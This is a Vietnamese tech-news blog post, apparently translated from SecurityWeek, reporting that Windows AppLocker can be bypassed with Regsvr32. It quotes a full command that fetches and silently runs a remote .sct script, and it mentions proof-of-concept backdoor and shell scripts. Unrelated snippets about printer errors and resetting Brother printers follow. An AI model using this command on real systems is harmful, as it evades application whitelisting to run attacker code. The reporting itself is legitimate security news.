Chuyển đến nội dung chính

Windows AppLocker có thể bị vượt qua để thực thi script từ xa

Windows AppLocker của Microsoft, tính năng an ninh trong Windows 7 có nhiệm vụ xác định những người dùng có thể chạy ứng dụng trong phạm vi một tổ chức, có thể bị vượt qua để thực thi script từ xa trên máy tính.

Khi AppLocker được đưa vào Windows 7 và Windows Server 2008 R2, quản trị hệ thống có thể thiết lập các quy định cho phép hoặc từ chối chạy ứng dụng. Những quy định này có thể được áp dụng cho người dùng hoặc nhóm người dùng cụ thể và có thể được sử dụng cho các tập tin thực thi (.exe và .com), các script (.js, .ps1, .vbs, cmd, và .bat), tập tin Windows Installer (.msi và .msp), và tập tin DLL (.dll và .ocx).

Click image for larger version

Name: applocker.png
Views: 1
Size: 45,4 KB
ID: 56300

Để có thể vượt qua Windows AppLocker, tin tặc phải kiểm soát được vị trí nào đó trên máy tính mục tiêu và phải sử dụng Regsvr32, tiện ích dòng lệnh được thiết kế cho việc đăng ký DLL trong registry, theo nhà nghiên cứu an ninh Casey Smith.

Nhà nghiên cứu phát hiện cách tốt nhất để vượt qua AppLocker là đặt khối script vào bên trong thẻ Registration và sau đó sử dụng Regsvr32 để thực thi mã. Theo Smith, đoạn mã trong thẻ đăng ký thực thi việc đăng ký (register) và hủy bỏ (unregister).

Lợi dụng Regsvr32 để thực thi script mang lại rất nhiều lợi ích, vì công cụ dòng lệnh này là proxy nhận thức, sử dụng TLS, làm theo các chuyển hướng, và cũng có thể được thiết lập để chạy ngầm và không hiển thị bất kỳ thông báo nào.

“Vì vậy, tất cả những gì bạn cần làm là lưu tập tin .sct tại vị trí mà bạn kiểm soát. Từ mục tiêu, chỉ cần thực thi lệnh regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll. Để kích hoạt việc vượt qua, đặt khối mã, VB hoặc JS bên trong thẻ <registration>”.

Nhà nghiên cứu cho biết, việc vượt qua cũng có thể được sử dụng để gọi một tập tin cục bộ, và việc thực thi script từ thẻ registration không thực sự đăng ký đối tượng COM, có nghĩa là sẽ không có gì xuất hiện trong registry. Nhà nghiên cứu đã tạo ra một tập hợp các script proof-of-concept có thể được tải về qua Regsvr32 để mở một backdoor hoặc một shell trên HTTP.

Có trong cả Windows 10, AppLocker được coi là một trong những tính năng an ninh quan trọng nhất trong nền tảng này. Theo Microsoft, AppLocker là một trong những tính năng của Windows 10 cung cấp các giải pháp giảm thiểu tương đương (hoặc tốt hơn) EMET (Enhanced Mitigation Experience Toolkit).

Đây không phải là lần đầu tiên tiện ích Regsvr32 được phát hiện cho phép kẻ xâm nhập khả năng thực hiện các hành vi bất chính trên máy tính mục tiêu. Trong năm 2014, Trojan ngân hàng Neverquest cũng lợi dụng tiện ích này để thực hiện module DLL của mình.

Theo SecurityWeek

Nhận xét

Bài đăng phổ biến từ blog này

How to Fix Windows Error 0x00000709

add a share printer error 0x00000709. Follow this step by step guide to learn how to fix this error: In this tutorial, we will teach you how to fix the Blue Screen of Death Stop Error 0x00000709. The error "0x00000709" occurs when you try to connect a shared printer over the network. The printer exists but you are unable to connect and you will get this error. Step 1 -- Open RUN type: \\192.168.1.111  Enter Step 2 -- Open the shared printer When the network path window opens up, double click on the printer. A pop-up window will appear and will show you the error: "Operation could not be completed error 0x00000709". Click on the Ok button and close all the windows. Step 3 -- Go to Devices & Printers Now let's resolve the error and properly add the shared printer. First of all, open the start menu and click on Devices and Printers. Step 4 -- Add a printer In the Devices and Printers window, click on the Add a Printer tab. Choose to add a lo...

Reset hộp mực máy in brother

Đổ mực máy in   Brother rất đơn giản ! Nhưng khi đổ mực xong phải biết cách reset thì máy mới hoạt động bình thường, nếu không máy sẽ vẫn thông báo đèn toner, toner low, toner empty....Hôm nay mực in Tây Hồ xin hướng dẫn các bạn cách   Reset máy in brother 2140   và các loại máy in cùng dòng : 2130,2250, 2250dn, 2240, 2240dn... CÁC DÒNG MÁY IN BROTHER KHÁC Bother HL : 2130 /2140/2240/2250/2240d/2250dn/1111 Brother J100/140/140w/125/125w Brother J200/220/220w Brother J315/315w/3520/3520dw Brother J410/430/415w/415dw Brother J725/725dw Brother J825/825dw RESET MÁY IN BROTHER 2140/2130/2240/2250DN Có rất nhiều cách  Reset máy in brother 2140 , 2130,2240, 2250. Nhưng có 2 cách reset miễn phí không mất tiền Mực in Tây Hồ giới thiệu sau đây sẽ giúp các bạn có thể tự làm tại nhà. Có 2 loại Reset máy in brother :  Reset mực :  Bằng tay  hoặc bằng bộ  Kit reset Reset Trống Tại sao pha...

Hướng dẫn reset máy in brother 2701dw

Mở nắp cửa tháo hộp mực máy in ra, cụm cartridge gồm 2 phần : cụm trống và cụm mực. Dùng tuốc-nơ-vít 4 cạnh vặn 2 con ốc tháo cụm bánh răng reset ra ( 2 con ốc nằm ở bên phía bánh răng ), bên phía bánh răng có 3 con ốc thì văn 2 con ra. Tháo cụm cartridge ra chúng ta để ý vị trí của  nẫy nhựa màu trắng  ở vị trí bên trái của cung tròn. Tháo được cụm bánh răng reset ra ( hình ảnh ) Bánh răng reset là bánh răng có gắn lò xo ở phía trên. Tháo rời các bánh răng ra Nắp nhựa màu đen ( khoanh đỏ ) bạn dùng tua-vít 2 cạnh bẩy cái nắp ra để đổ mực vào trong sau đó nắp lại như cũ ( để ý không làm gãy hoặc méo trục nhựa màu đen để ráp bánh răng vào ). Để ý khi máy in báo : “ tonner empty ”  trên màn hình   nghĩa là máy đã hết mực.   Đổ mực xong chúng ra lắp bánh răng như hình dưới để reset : Bánh răng bên cạnh cũng phải đúng vị trí. vấu nhựa ...